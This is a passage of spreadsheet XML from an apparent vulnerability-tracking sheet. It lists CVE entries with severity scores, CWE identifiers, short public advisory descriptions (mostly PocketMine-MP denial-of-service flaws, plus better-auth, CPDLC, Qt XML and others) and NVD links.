          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3072" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51010</t>
        </is>
      </c>
      <c r="C3072" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3072" s="5" t="inlineStr"/>
      <c r="F3072" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3072" s="5" t="inlineStr"/>
      <c r="H3072" s="5" t="inlineStr"/>
      <c r="I3072" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3072" s="5" t="inlineStr"/>
      <c r="K3072" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3072" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.4.2 fail to properly validate item IDs received from clients in itemstack NBT data. Attackers can send crafted item IDs outside the valid range to trigger an uncaught exception that crashes the server.</t>
        </is>
      </c>
      <c r="M3072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51010</t>
        </is>
      </c>
    </row>
    <row r="3073">
      <c r="A3073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3073" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51012</t>
        </is>
      </c>
      <c r="C3073" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3073" s="5" t="inlineStr"/>
      <c r="F3073" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3073" s="5" t="inlineStr"/>
      <c r="H3073" s="5" t="inlineStr"/>
      <c r="I3073" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3073" s="5" t="inlineStr"/>
      <c r="K3073" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3073" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.2.9 fail to properly validate NBT data types during deserialization of inventory transaction packets from clients. Attackers can send crafted inventory transactions with malformed NBT tags to trigger server crashes and cause denial of service.</t>
        </is>
      </c>
      <c r="M3073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51012</t>
        </is>
      </c>
    </row>
    <row r="3074">
      <c r="A3074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3074" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51013</t>
        </is>
      </c>
      <c r="C3074" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3074" s="5" t="inlineStr"/>
      <c r="F3074" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3074" s="5" t="inlineStr"/>
      <c r="H3074" s="5" t="inlineStr"/>
      <c r="I3074" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3074" s="5" t="inlineStr"/>
      <c r="K3074" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3074" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.2.3 fail to validate damage metadata values in tool and armor item NBT data received from clients. Attackers can send negative or out-of-range damage values in itemstack NBT to trigger unhandled exceptions in the Durable class, causing server crashes.</t>
        </is>
      </c>
      <c r="M3074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51013</t>
        </is>
      </c>
    </row>
    <row r="3075">
      <c r="A3075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3075" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51014</t>
        </is>
      </c>
      <c r="C3075" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3075" s="5" t="inlineStr"/>
      <c r="F3075" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3075" s="5" t="inlineStr"/>
      <c r="H3075" s="5" t="inlineStr"/>
      <c r="I3075" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3075" s="5" t="inlineStr"/>
      <c r="K3075" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L3075" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.0.7 contains an unhandled exception vulnerability in the ModalFormResponsePacket handler when processing malformed JSON from clients. Attackers can send specially crafted form response packets with invalid JSON to trigger an uncaught InvalidArgumentException, causing server crashes.</t>
        </is>
      </c>
      <c r="M3075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51014</t>
        </is>
      </c>
    </row>
    <row r="3076">
      <c r="A3076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3076" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51015</t>
        </is>
      </c>
      <c r="C3076" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3076" s="5" t="inlineStr"/>
      <c r="F3076" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3076" s="5" t="inlineStr"/>
      <c r="H3076" s="5" t="inlineStr"/>
      <c r="I3076" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3076" s="5" t="inlineStr"/>
      <c r="K3076" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3076" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.0.6 does not validate facing values in PlayerActionPacket (for START_BREAK and CRACK_BREAK actions) or in UseItemTransactionData (typically within InventoryTransactionPacket). A remote authenticated attacker can send crafted packets with invalid facing values (e.g., negative or out-of-range) to crash the server, resulting in a denial of service.</t>
        </is>
      </c>
      <c r="M3076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51015</t>
        </is>
      </c>
    </row>
    <row r="3077">
      <c r="A3077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3077" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51018</t>
        </is>
      </c>
      <c r="C3077" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3077" s="5" t="inlineStr"/>
      <c r="F3077" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3077" s="5" t="inlineStr"/>
      <c r="H3077" s="5" t="inlineStr"/>
      <c r="I3077" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3077" s="5" t="inlineStr"/>
      <c r="K3077" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3077" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 3.26.5 and 4.0.x before 4.0.5 does not limit book page text length, page count, or author/title length. A player who obtains a writable book can create oversized NBT ('book bombs'), causing excess bandwidth consumption and server crashes (exceeding the 1 MB chunk size limit when saving region-based worlds in PM3, or exceeding the 32 KiB TAG_String limit in PM4).</t>
        </is>
      </c>
      <c r="M3077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51018</t>
        </is>
      </c>
    </row>
    <row r="3078">
      <c r="A3078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3078" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54392</t>
        </is>
      </c>
      <c r="C3078" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3078" s="5" t="inlineStr"/>
      <c r="F3078" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3078" s="5" t="inlineStr"/>
      <c r="H3078" s="5" t="inlineStr"/>
      <c r="I3078" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3078" s="5" t="inlineStr"/>
      <c r="K3078" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3078" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions &gt;= 4.20.0 before 4.22.3 (and before 5.2.1 in the 5.x branch) fail to validate NBT tag types in BlockActorDataPacket. A player can crash the server by sending a packet containing sign NBT data with an incorrect tag type, triggering an unhandled UnexpectedTagTypeException that terminates the server process.</t>
        </is>
      </c>
      <c r="M3078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54392</t>
        </is>
      </c>
    </row>
    <row r="3079">
      <c r="A3079" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3079" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54396</t>
        </is>
      </c>
      <c r="C3079" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3079" s="5" t="inlineStr"/>
      <c r="F3079" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3079" s="5" t="inlineStr"/>
      <c r="H3079" s="5" t="inlineStr"/>
      <c r="I3079" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3079" s="5" t="inlineStr"/>
      <c r="K3079" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="L3079" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.8.1 fail to validate dye color IDs in banner NBT data during deserialization. Attackers can provide invalid color values in inventory transactions or via commands to trigger undefined offset errors and crash the server.</t>
        </is>
      </c>
      <c r="M3079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54396</t>
        </is>
      </c>
    </row>
    <row r="3080">
      <c r="A3080" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3080" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-14047</t>
        </is>
      </c>
      <c r="C3080" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3080" s="5" t="inlineStr"/>
      <c r="F3080" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3080" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3080" s="5" t="inlineStr">
        <is>
          <t>elastic:winlogbeat</t>
        </is>
      </c>
      <c r="I3080" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3080" s="5" t="inlineStr"/>
      <c r="K3080" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3080" s="5" t="inlineStr">
        <is>
          <t>A local vulnerability in the Winlogbeat Windows installer caused runtime files to be placed in a directory writable by unprivileged users. A low-privileged attacker with existing access to the system could pre-position malicious filesystem links, causing a subsequent elevated Winlogbeat operation to write to or delete arbitrary files. Successful exploitation could result in a denial of service.</t>
        </is>
      </c>
      <c r="M3080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-14047</t>
        </is>
      </c>
    </row>
    <row r="3081">
      <c r="A3081" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3081" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58380</t>
        </is>
      </c>
      <c r="C3081" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3081" s="5" t="inlineStr"/>
      <c r="F3081" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3081" s="5" t="inlineStr"/>
      <c r="H3081" s="5" t="inlineStr"/>
      <c r="I3081" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3081" s="5" t="inlineStr"/>
      <c r="K3081" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3081" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.11.2 contain a denial of service vulnerability in BookEditPacket handling that crashes the server when an invalid inventory slot value is provided. Attackers can send a crafted BookEditPacket with an inventory slot greater than 35 to trigger an unhandled exception and crash the server.</t>
        </is>
      </c>
      <c r="M3081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58380</t>
        </is>
      </c>
    </row>
    <row r="3082">
      <c r="A3082" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3082" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-29419</t>
        </is>
      </c>
      <c r="C3082" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3082" s="5" t="inlineStr"/>
      <c r="F3082" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3082" s="5" t="inlineStr"/>
      <c r="H3082" s="5" t="inlineStr"/>
      <c r="I3082" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3082" s="5" t="inlineStr"/>
      <c r="K3082" s="5" t="inlineStr">
        <is>
          <t>CWE-300</t>
        </is>
      </c>
      <c r="L3082" s="5" t="inlineStr">
        <is>
          <t>CTFd v3.7.6 was discovered to be vulnerable to a man-in-the-middle attack.</t>
        </is>
      </c>
      <c r="M3082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-29419</t>
        </is>
      </c>
    </row>
    <row r="3083">
      <c r="A3083" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3083" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71400</t>
        </is>
      </c>
      <c r="C3083" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3083" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3083" s="5" t="inlineStr"/>
      <c r="F3083" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3083" s="5" t="inlineStr"/>
      <c r="H3083" s="5" t="inlineStr"/>
      <c r="I3083" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J3083" s="5" t="inlineStr"/>
      <c r="K3083" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3083" s="5" t="inlineStr">
        <is>
          <t>better-auth passkey versions before 1.4.0 contain an insecure direct object reference vulnerability in the passkey deletion endpoint that allows authenticated users to delete arbitrary passkeys by ID. Attackers with valid sessions can submit crafted requests to the delete-passkey endpoint with enumerated passkey IDs to remove other users' passkeys.</t>
        </is>
      </c>
      <c r="M3083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71400</t>
        </is>
      </c>
    </row>
    <row r="3084">
      <c r="A3084" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3084" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71403</t>
        </is>
      </c>
      <c r="C3084" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3084" s="5" t="inlineStr"/>
      <c r="F3084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3084" s="5" t="inlineStr"/>
      <c r="H3084" s="5" t="inlineStr"/>
      <c r="I3084" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J3084" s="5" t="inlineStr"/>
      <c r="K3084" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L3084" s="5" t="inlineStr">
        <is>
          <t>better-auth versions before 1.1.20 contain a bypass vulnerability in trustedOrigins validation logic affecting absolute URLs and wildcard domains. Attackers can construct malicious callbackURL parameters that pass origin checks and trigger open redirects to steal sensitive tokens for account takeover.</t>
        </is>
      </c>
      <c r="M3084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71403</t>
        </is>
      </c>
    </row>
    <row r="3085">
      <c r="A3085" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3085" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71409</t>
        </is>
      </c>
      <c r="C3085" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3085" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3085" s="5" t="inlineStr"/>
      <c r="F3085" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3085" s="5" t="inlineStr"/>
      <c r="H3085" s="5" t="inlineStr"/>
      <c r="I3085" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3085" s="5" t="inlineStr"/>
      <c r="K3085" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L3085" s="5" t="inlineStr">
        <is>
          <t>Lack of authentication for Very High Frequency Data Link messages allows rogue ground stations to inject CPDLC messages leading to unexpected or misleading clearances and potential pilot confusion. This type of attack can be carried out remotely over radio frequency.</t>
        </is>
      </c>
      <c r="M3085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71409</t>
        </is>
      </c>
    </row>
    <row r="3086">
      <c r="A3086" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3086" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71412</t>
        </is>
      </c>
      <c r="C3086" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3086" s="5" t="inlineStr"/>
      <c r="F3086" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3086" s="5" t="inlineStr"/>
      <c r="H3086" s="5" t="inlineStr"/>
      <c r="I3086" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3086" s="5" t="inlineStr"/>
      <c r="K3086" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L3086" s="5" t="inlineStr">
        <is>
          <t>Injection of false emergency or status messages over CPDLC may lead to misallocation of resources, operational confusion, and improper response actions by flight crews, traffic controllers, and ground operations.  This type of attack can be carried out remotely over radio frequency.</t>
        </is>
      </c>
      <c r="M3086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71412</t>
        </is>
      </c>
    </row>
    <row r="3087">
      <c r="A3087" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3087" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71417</t>
        </is>
      </c>
      <c r="C3087" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3087" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3087" s="5" t="inlineStr"/>
      <c r="F3087" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3087" s="5" t="inlineStr"/>
      <c r="H3087" s="5" t="inlineStr"/>
      <c r="I3087" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3087" s="5" t="inlineStr"/>
      <c r="K3087" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3087" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.32.1 fails to validate uniqueness of pack UUIDs in ResourcePackClientResponsePacket STATUS_SEND_PACKS handling, allowing authenticated clients to trigger duplicate pack transmissions. Attackers can send multiple copies of valid pack UUIDs in a single packet to exhaust server memory and cause denial of service.</t>
        </is>
      </c>
      <c r="M3087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71417</t>
        </is>
      </c>
    </row>
    <row r="3088">
      <c r="A3088" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11573</t>
        </is>
      </c>
      <c r="C3088" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3088" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3088" s="5" t="inlineStr"/>
      <c r="F3088" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3088" s="5" t="inlineStr"/>
      <c r="H3088" s="5" t="inlineStr"/>
      <c r="I3088" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3088" s="5" t="inlineStr"/>
      <c r="K3088" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L3088" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion (CWE-674) in the QDomDocument/QDomNode serialization path of the Qt XML module (QtXml, qtbase). QDomElementPrivate::save() and QDomNodePrivate::save() recurse mutually, consuming one stack frame per level of element nesting with no depth limit, no configurable bound and no error return. A document with deeply nested elements parses successfully but exhausts the call stack and terminates the process when serialized. Reachable via QDomDocument::toByteArray() (Qt 4.0 and later), QDomDocument::toString(), QDomDocument::toCString(), QDomNode::save(), and operator&lt;&lt;(QTextStream&amp;, const QDomNode&amp;). Denial of service only — no code execution and no memory disclosure.</t>
        </is>
      </c>
      <c r="M3088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t>
        </is>
      </c>
    </row>
    <row r="3089">
      <c r="A3089" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16007</t>
        </is>
      </c>
      <c r="C3089" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3089" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3089" s="5" t="inlineStr"/>
      <c r="F3089" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3089" s="5" t="inlineStr"/>
      <c r="H3089" s="5" t="inlineStr"/>
      <c r="I3089" s="5" t="inlineStr">
        <is>
          <t>2026-08-15</t>
        </is>
      </c>
      <c r="J3089" s="5" t="inlineStr"/>
      <c r="K3089" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3089" s="5" t="inlineStr">
        <is>
          <t>AppFlowy's qcuiknote feature is affected by a SQL injection vulnerability. Authenticated users with access to the feature can inject arbitrary SQL to exfiltrate data in the underlying SQL database.</t>
        </is>
      </c>
      <c r="M3089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16007</t>
        </is>
      </c>
    </row>
    <row r="3090">
      <c r="A3090" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16118</t>
        </is>
      </c>
      <c r="C3090" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3090" s="5" t="inlineStr"/>
      <c r="F3090" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3090" s="5" t="inlineStr"/>
      <c r="H3090" s="5" t="inlineStr"/>
      <c r="I3090" s="5" t="inlineStr">
        <is>
          <t>2026-07-17</t>
        </is>
      </c>
      <c r="J3090" s="5" t="inlineStr"/>
      <c r="K3090" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3090" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in xdgmime. A heap-based buffer overflow can be triggered in _xdg_mime_magic_parse_magic_line() in the xdgmimemagic.c file on little-endian systems when an attacker-controlled MIME magic file in a user-writable XDG data location (e.g., in the $XDG_DATA_HOME/mime/magic path) is parsed by an application performing MIME type detection (e.g., via g_content_type_guess()). When performing byte-swap, incorrect pointer arithmetic on the write side causes an out-of-bounds write of 2 bytes, resulting in an application crash or memory corruption.</t>
        </is>
      </c>
      <c r="M3090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16118</t>
        </is>
      </c>
    </row>
    <row r="3091">
      <c r="A3091" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16281</t>
        </is>
      </c>
      <c r="C3091" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3091" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3091" s="5" t="inlineStr"/>
      <c r="F3091" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3091" s="5" t="inlineStr"/>
      <c r="H3091" s="5" t="inlineStr"/>
      <c r="I3091" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3091" s="5" t="inlineStr"/>
      <c r="K3091" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3091" s="5" t="inlineStr">
        <is>
          <t>The Classified Listing  WordPress plugin before 6.1.1 does not verify that the caller owns or can edit the target listing before its AI image-editing AJAX action deletes or attaches media, allowing any authenticated user, including a subscriber, to permanently delete attachments from, and attach files to, any listing owned by another user.</t>
        </is>
      </c>
      <c r="M3091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16281</t>
        </is>
      </c>
    </row>
    <row r="3092">
      <c r="A3092" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16769</t>
        </is>
      </c>
      <c r="C3092" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3092" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3092" s="5" t="inlineStr"/>
      <c r="F3092" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3092" s="5" t="inlineStr"/>
      <c r="H3092" s="5" t="inlineStr"/>
      <c r="I3092" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3092" s="5" t="inlineStr"/>
      <c r="K3092" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="L3092" s="5" t="inlineStr">
        <is>
          <t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t>
        </is>
      </c>
      <c r="M3092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t>
        </is>
      </c>
    </row>
    <row r="3093">
      <c r="A3093" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17627</t>
        </is>
      </c>
      <c r="C3093" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3093" s="5" t="inlineStr"/>
      <c r="F3093" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3093" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H3093" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I3093" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3093" s="5" t="inlineStr"/>
      <c r="K3093" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3093" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information and inject messages into workflow history due to improper authorization.</t>
        </is>
      </c>
      <c r="M3093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17627</t>
        </is>
      </c>
    </row>
    <row r="3094">
      <c r="A3094" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18497</t>
        </is>
      </c>
      <c r="C3094" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3094" s="5" t="inlineStr"/>
      <c r="F3094" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3094" s="5" t="inlineStr"/>
      <c r="H3094" s="5" t="inlineStr"/>
